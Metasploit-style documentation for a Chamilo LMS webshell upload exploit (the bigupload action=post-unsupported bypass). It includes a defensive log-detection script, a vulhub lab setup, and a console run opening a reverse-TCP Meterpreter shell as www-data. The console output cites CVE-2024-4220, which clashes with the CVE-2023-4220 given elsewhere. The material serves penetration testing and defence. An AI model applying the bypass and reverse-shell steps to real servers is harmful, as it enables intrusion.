Vulnerable Application
Chamilo LMS is a free software e-learning and content management system. In versions <= v1.11.24
a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter action is set to
post-unsupported, file extension checks are skipped, allowing attacker-controlled .php files to be uploaded to
/main/inc/lib/javascript/bigupload/files/ if the /files/ directory already exists (it does not exist
by default).
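As an added example (not part of the module documentation), the following detection script shows how a defender would spot the two artifacts this bug leaves in a web server access log: a request to the bigupload endpoint with action=post-unsupported, and a subsequent request for a script file under the /files/ directory the page names as the upload destination. The log lines are constructed in Apache "combined" format; the exact script filename under /bigupload/inc/ is not relied upon, only the directory prefix and the query parameter the page describes.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache "combined" format); not from any real deployment.
# Line 1: upload request with the extension check bypass parameter.
# Line 2: the uploaded script being requested from the upload directory.
# Lines 3-4: benign traffic to the same endpoint and directory.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2024:10:41:58 -0800] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 43 "-" "python-requests/2.31"
10.0.0.5 - - [11/Nov/2024:10:42:01 -0800] "GET /main/inc/lib/javascript/bigupload/files/kFAqQcbWxs.php HTTP/1.1" 200 1024 "-" "python-requests/2.31"
10.0.0.9 - - [11/Nov/2024:10:45:12 -0800] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post HTTP/1.1" 200 43 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Nov/2024:10:45:30 -0800] "GET /main/inc/lib/javascript/bigupload/files/lecture.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

BIGUPLOAD_DIR = "/main/inc/lib/javascript/bigupload/"   # directory named on the page
UPLOAD_DIR = BIGUPLOAD_DIR + "files/"                   # where bypassed uploads land
# Extensions a PHP-capable web server may execute; assumed list, extend to match your server config.
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")


def parse_line(line):
    """Return a dict with ip, ts, method, path, query and status, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)
    rec["query"] = parse_qs(parts.query)   # parse_qs percent-decodes values
    return rec


def findings_for(rec):
    """Tag one parsed request with the indicators relevant to this bug (empty list if none)."""
    tags = []
    path = rec["path"].lower()
    # Indicator 1: any request under the bigupload directory carrying action=post-unsupported.
    if path.startswith(BIGUPLOAD_DIR) and "post-unsupported" in rec["query"].get("action", []):
        tags.append("bigupload_unsupported_action")
    # Indicator 2: a server-side script being fetched from the upload directory.
    if path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXTS):
        tags.append("script_in_upload_dir")
    return tags


def scan_log(text):
    """Scan log text and return one hit per request that matched at least one indicator."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = findings_for(rec)
        if tags:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                         "path": rec["path"], "status": rec["status"], "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Either indicator alone is worth an alert; both from the same client within a short window, as in the first two sample lines, is the full pattern. On a patched or non-vulnerable host the second indicator should never fire, because nothing legitimate places executable scripts in that directory; it also serves as a quick audit of an existing deployment by checking what is already on disk under /files/.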
Setup
A vulnerable docker-compose configuration can be found at the following link: https://github.com/vulhub/vulhub/pull/559
Clone the vulhub repo (https://github.com/vulhub/vulhub.git) and check out the pull request mentioned above.
Once cloned, run cd vulhub/chamilo/CVE-2023-4220. Then run docker compose up.
After the container is built, navigate to http://127.0.0.1:8080 to complete the installation wizard.
Note when filling out the database IP address and credentials: the DB hostname is the name of the container, which is
mariadb (not localhost or 127.0.0.1). Once the installation wizard is complete, the target should be ready to be
exploited with the module. This container already has the non-default /files/ directory created.
Verification Steps
- Start msfconsole
- Do: use linux/http/chamilo_bigupload_webshell
- Set the RHOST, RPORT, and LHOST options
- Run the module
- Receive a Meterpreter session as the www-data user
Scenarios
Chamilo 1.11.18 running in Docker
msf6 > use linux/http/chamilo_bigupload_webshell
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
rport => 8080
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > show options
Module options (exploit/linux/http/chamilo_bigupload_webshell):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/chamilo_bigupload_webshell) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
[*] Sending stage (40004 bytes) to 172.16.199.1
[+] Deleted 1nZaWHvP
[+] Deleted kFAqQcbWxs.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:60031) at 2024-11-11 10:42:06 -0800
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : c2064983b0e1
OS : Linux c2064983b0e1 6.10.11-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Oct 3 10:19:48 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >